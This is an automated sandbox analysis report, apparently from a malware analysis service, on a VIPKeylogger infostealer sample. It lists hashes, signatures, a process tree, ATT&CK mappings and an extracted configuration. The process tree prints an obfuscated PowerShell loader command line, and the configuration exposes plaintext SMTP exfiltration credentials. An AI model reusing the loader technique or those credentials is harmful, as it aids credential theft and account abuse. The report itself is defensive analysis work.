Analysis

max time kernel: 119s
max time network: 100s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-12-2024 05:27

Static task: static1

Behavioral task: behavioral1
    Sample: 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe
    Resource: win7-20240729-en

Behavioral task: behavioral2
    Sample: 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe
    Resource: win10v2004-20241007-en
General

Target: 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe
Size: 1.0MB
MD5: a4272146962443a5d3795d2443268660
SHA1: c4b0dea3202c5e7fcb6d97a099b71be43c141066
SHA256: 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30
SHA512: f136c4e2d8d1b77ddc8cbe768c1a7d268bd9a415720b873c98aff2f3c7be441880dafc6b8897b9804891e055ccf1f2b522d762641a97f3811241f8d4d5caf0de
SSDEEP: 24576:Ij+E5UmQgGxoeTKDCAJvxADGSifhNwmNG3Ap137dboaPjyMi76Kbi:Y+HmWxKDCA9fQt3IRM+i76t
Malware Config

Extracted: vipkeylogger
    Protocol: smtp
    Host: smtp.ionos.es
    Port: 587
    Username: [email protected]
    Password: JA-*2020antonio
    Email To: [email protected]
Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was found in 2020.

Vipkeylogger family

Loads dropped DLL (1 IoCs)
    pid 2228  Trense.exe

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk, where infostealers will often target it.

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
    Key opened: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (Trense.exe)
    Key opened: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (Trense.exe)
    Key opened: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (Trense.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
    flow 21  drive.google.com
    flow 22  drive.google.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
    flow 34  checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
    pid 2228  Trense.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
    pid 3936  powershell.exe
    pid 2228  Trense.exe

Command and Scripting Interpreter: PowerShell (1 IoCs)
    pid 3936  powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
    Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe)
    Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (powershell.exe)
    Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (Trense.exe)

Suspicious behavior: EnumeratesProcesses (11 IoCs)
    pid 3936  powershell.exe  (9 occurrences)
    pid 2228  Trense.exe  (2 occurrences)

Suspicious behavior: MapViewOfSection (1 IoCs)
    pid 3936  powershell.exe

Suspicious use of AdjustPrivilegeToken (23 IoCs)
    Token: SeDebugPrivilege  (pid 3936, powershell.exe)
    Token: SeIncreaseQuotaPrivilege  (pid 3936, powershell.exe)
    Token: SeSecurityPrivilege  (pid 3936, powershell.exe)
    Token: SeTakeOwnershipPrivilege  (pid 3936, powershell.exe)
    Token: SeLoadDriverPrivilege  (pid 3936, powershell.exe)
    Token: SeSystemProfilePrivilege  (pid 3936, powershell.exe)
    Token: SeSystemtimePrivilege  (pid 3936, powershell.exe)
    Token: SeProfSingleProcessPrivilege  (pid 3936, powershell.exe)
    Token: SeIncBasePriorityPrivilege  (pid 3936, powershell.exe)
    Token: SeCreatePagefilePrivilege  (pid 3936, powershell.exe)
    Token: SeBackupPrivilege  (pid 3936, powershell.exe)
    Token: SeRestorePrivilege  (pid 3936, powershell.exe)
    Token: SeShutdownPrivilege  (pid 3936, powershell.exe)
    Token: SeDebugPrivilege  (pid 3936, powershell.exe)
    Token: SeSystemEnvironmentPrivilege  (pid 3936, powershell.exe)
    Token: SeRemoteShutdownPrivilege  (pid 3936, powershell.exe)
    Token: SeUndockPrivilege  (pid 3936, powershell.exe)
    Token: SeManageVolumePrivilege  (pid 3936, powershell.exe)
    Token: 33  (pid 3936, powershell.exe)
    Token: 34  (pid 3936, powershell.exe)
    Token: 35  (pid 3936, powershell.exe)
    Token: 36  (pid 3936, powershell.exe)
    Token: SeDebugPrivilege  (pid 2228, Trense.exe)

Suspicious use of WriteProcessMemory (7 IoCs)
    PID 3932 wrote to memory of 3936  (pid 3932, 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe, procid_target 83)
    PID 3932 wrote to memory of 3936  (pid 3932, 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe, procid_target 83)
    PID 3932 wrote to memory of 3936  (pid 3932, 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe, procid_target 83)
    PID 3936 wrote to memory of 2228  (pid 3936, powershell.exe, procid_target 97)
    PID 3936 wrote to memory of 2228  (pid 3936, powershell.exe, procid_target 97)
    PID 3936 wrote to memory of 2228  (pid 3936, powershell.exe, procid_target 97)
    PID 3936 wrote to memory of 2228  (pid 3936, powershell.exe, procid_target 97)

outlook_office_path (1 IoCs)
    Key opened: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (Trense.exe)

outlook_win_path (1 IoCs)
    Key opened: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (Trense.exe)
Processes

Depth 1: C:\Users\Admin\AppData\Local\Temp\48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe"
    PID: 3932
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    Depth 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "powershell.exe" -windowstyle minimized "$Hollows=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\Polysulfonate\sangersken\Exposals.Kom196';$Cindersbanerne=$Hollows.SubString(58520,3);.$Cindersbanerne($Hollows)"
        PID: 3936
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        Depth 3: C:\Users\Admin\AppData\Local\Temp\Trense.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\Trense.exe"
            PID: 2228
            - Loads dropped DLL
            - Accesses Microsoft Outlook profiles
            - Suspicious use of NtCreateThreadExHideFromDebugger
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - outlook_office_path
            - outlook_win_path
Network

MITRE ATT&CK Enterprise v15

Credential Access
    - Credentials from Password Stores (1)
        - Credentials from Web Browsers (1)
    - Unsecured Credentials (2)
        - Credentials In Files (2)
Downloads